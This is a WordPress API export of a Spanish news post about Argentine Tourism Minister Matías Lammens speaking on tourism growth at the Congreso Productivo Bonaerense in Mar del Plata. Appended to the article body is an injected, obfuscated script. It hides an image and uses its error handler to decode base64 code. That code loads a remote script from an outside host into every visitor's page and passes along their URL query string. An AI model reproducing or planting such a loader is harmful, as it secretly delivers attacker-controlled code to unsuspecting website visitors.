{"id":6859,"date":"2023-06-08T09:44:36","date_gmt":"2023-06-08T12:44:36","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6859"},"modified":"2025-08-13T15:59:23","modified_gmt":"2025-08-13T18:59:23","slug":"lammens-en-el-congreso-productivo-bonaerense-el-turismo-es-una-de-las-actividades-que-mas-empujan-el-crecimiento-de-la-argentina","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6859","title":{"rendered":"Lammens en el Congreso Productivo Bonaerense: \u201cEl turismo es una de las actividades que m\u00e1s empujan el crecimiento de la Argentina\u201d"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-text-color\" style=\"color:#035e94\"><em>Encabez\u00f3 el panel \u201cEl turismo como herramienta de desarrollo\u00bb<\/em><\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-727x1024.jpg\" alt=\"\" class=\"wp-image-6825\" width=\"296\" height=\"417\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-727x1024.jpg 727w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-213x300.jpg 213w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-768x1082.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-1091x1536.jpg 1091w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-696x980.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-1068x1504.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-298x420.jpg 298w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-320x451.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-480x676.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-800x1127.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007.jpg 1136w\" sizes=\"(max-width: 296px) 100vw, 296px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>El ministro de Turismo y Deportes de la Naci\u00f3n, Mat\u00edas Lammens, particip\u00f3 por teleconferencia de la segunda jornada del Congreso Productivo Bonaerense, que se realiza en la ciudad de Mar del Plata. All\u00ed expuso sobre el desarrollo estrag\u00e9gico del turismo como pol\u00edtica de Estado en el panel \u201cEl turismo como herramienta de desarrollo\u201d.<\/p>\n\n\n\n<p>Durante su exposici\u00f3n, Lammens trat\u00f3 temas como las cifras r\u00e9cord de turismo interno en 2022, impulsadas por PreViaje, y el crecimiento del turismo receptivo, que ya supera los n\u00fameros prepandemia generando importantes divisas para la Argentina.<\/p>\n\n\n\n<p>En ese marco, el ministro destac\u00f3: \u201cEl turismo tiene un caso de \u00e9xito para contar. En el momento de mayor dificultad, pudimos lograr grandes acuerdos con las 24 provincias y con el sector privado y eso se ve reflejado en los n\u00fameros. Hoy tenemos m\u00e1s empresas que antes en 2019. Somos uno de los sectores que m\u00e1s empujan el crecimiento en la Argentina\u201d.<\/p>\n\n\n\n<p>En el mismo sentido, agreg\u00f3: \u201cArgentina ve una perspectiva de mediano plazo muy alentadora y el turismo tiene mucho para aportar en esa l\u00ednea a la hora de generar divisas. Hoy, es una de las principales actividades del pa\u00eds. Con esa convicci\u00f3n, llevamos adelante un plan integral de capacitaci\u00f3n, desarrollo y promoci\u00f3n. Estamos capacitando en roles esenciales de gastronom\u00eda y hoteler\u00eda, idiomas, oficios. Vamos a terminar nuestra gesti\u00f3n con m\u00e1s de 590 mil trabajadores capacitados a nivel federal\u201d.<\/p>\n\n\n\n<p>En resumen, Lammens valor\u00f3 el crecimiento del empleo en el sector tur\u00edstico, de la actividad econ\u00f3mica vinculada al sector y del creciente n\u00famero de empresas en el rubro. La provincia de Buenos Aires ostenta un lugar protag\u00f3nico en todos estos registros. Para finalizar, enumer\u00f3 distintos desaf\u00edos que debe enfrentar el turismo para consolidarse como un motor de desarrollo en el futuro.<\/p>\n\n\n\n<p>Participaron del panel \u201cEl turismo como herramienta de desarrollo\u201d el ministro de Producci\u00f3n, Ciencia e Innovaci\u00f3n Tecnol\u00f3gica provincial, Augusto Costa; la presidenta de la Asociaci\u00f3n Argentina de Hoteles, Gabriela Ferrucci; y la propietaria del Hotel Costa Galana, Claudia \u00c1lvarez Arg\u00fcello.<\/p>\n\n\n\n<p>El Congreso Productivo Bonaerense es un espacio de debate sobre estrategias para el desarrollo, la producci\u00f3n y el trabajo en la provincia de Buenos Aires. En esta edici\u00f3n, realizada en Mar del Plata el 6 y 7 de junio, cont\u00f3 con 25 paneles destinados a PyMEs, cooperativas, grandes empresas, sindicatos, universidades y entidades formativas, organismos de gobierno y la comunidad cient\u00edfica.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Encabez\u00f3 el panel \u201cEl turismo como herramienta de desarrollo\u00bb El ministro de Turismo y Deportes de la Naci\u00f3n, Mat\u00edas Lammens, particip\u00f3 por teleconferencia de la segunda jornada del Congreso Productivo Bonaerense, que se realiza en la ciudad de Mar del Plata. All\u00ed expuso sobre el desarrollo estrag\u00e9gico del turismo como pol\u00edtica de Estado en el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6860,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6859","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6859","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6859"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6859\/revisions"}],"predecessor-version":[{"id":10388,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6859\/revisions\/10388"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6860"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6859"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6859"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6859"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}